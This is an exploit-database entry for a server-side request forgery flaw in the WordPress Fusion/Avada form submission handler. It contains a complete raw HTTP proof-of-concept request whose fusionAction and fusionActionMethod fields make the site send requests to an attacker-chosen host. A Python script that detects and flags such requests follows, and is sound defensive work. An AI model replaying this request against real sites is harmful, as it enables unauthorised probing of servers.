## https://sploitus.com/exploit?id=WPEX-ID:BF7034AB-24C4-461F-A709-3F73988B536B
An attacker can control the URL (fusionAction parameter) and the method (fusionActionMethod parameter) of the HTTP request.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268
Content-Length: 1457
Connection: close

-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="formData"

email=aaa@bb.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&privacy_expiration_action=ignore&fusion-form-nonce-10361=e222df00dd&fusion-fields-hold-private-data=
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="action"

fusion_form_submit_form_to_url
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="fusion_form_nonce"

e222df00dd
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="form_id"

10361
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="post_id"

8988
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="field_labels"

{"email":"Email address"}
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="hidden_field_names"

[]
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="fusionAction"

https://arbitrary.com/
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="fusionActionMethod"

post
-----------------------------30259827232283860776499538268--
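
A detection-side check for requests of this shape, added here as an example and not part of the original advisory: it parses a multipart body and flags submissions whose action is fusion_form_submit_form_to_url and whose fusionAction destination or fusionActionMethod falls outside an allowlist. The allowlist values, function names and the sample body builder are assumptions constructed for illustration.

```python
import email
import ipaddress
from urllib.parse import urlsplit

WATCHED_ACTION = "fusion_form_submit_form_to_url"  # action value from the request above
ALLOWED_HOSTS = {"crm.example.org"}  # assumption: hosts your forms legitimately post to
ALLOWED_METHODS = {"post"}           # assumption: site policy

def multipart_fields(content_type: str, body: bytes) -> dict:
    """Parse a multipart/form-data body into {field name: value}."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw)
    fields = {}
    for part in msg.walk():
        name = part.get_param("name", header="content-disposition")
        if name:  # the multipart container itself has no field name
            fields[name] = part.get_payload(decode=True).decode("utf-8", "replace").strip()
    return fields

def review(content_type: str, body: bytes) -> list:
    """Return findings for one admin-ajax.php POST; an empty list means nothing to flag."""
    form = multipart_fields(content_type, body)
    if form.get("action") != WATCHED_ACTION:
        return []
    findings = []
    url = urlsplit(form.get("fusionAction", ""))
    host = (url.hostname or "").lower()
    if url.scheme not in ("http", "https"):
        findings.append(f"unexpected scheme: {url.scheme!r}")
    if host not in ALLOWED_HOSTS:
        findings.append(f"destination host not allowlisted: {host!r}")
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            findings.append(f"destination is an internal address: {host}")
    except ValueError:
        pass  # a hostname, not an IP literal
    method = form.get("fusionActionMethod", "").lower()
    if method not in ALLOWED_METHODS:
        findings.append(f"method not allowlisted: {method!r}")
    return findings

# Constructed sample: only the three relevant fields, with a shortened boundary.
SAMPLE_CT = "multipart/form-data; boundary=XBOUNDARY"
def sample_body(action_url: str, method: str) -> bytes:
    parts = {"action": WATCHED_ACTION, "fusionAction": action_url, "fusionActionMethod": method}
    out = "".join(f'--XBOUNDARY\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
                  for k, v in parts.items())
    return (out + "--XBOUNDARY--\r\n").encode()
```
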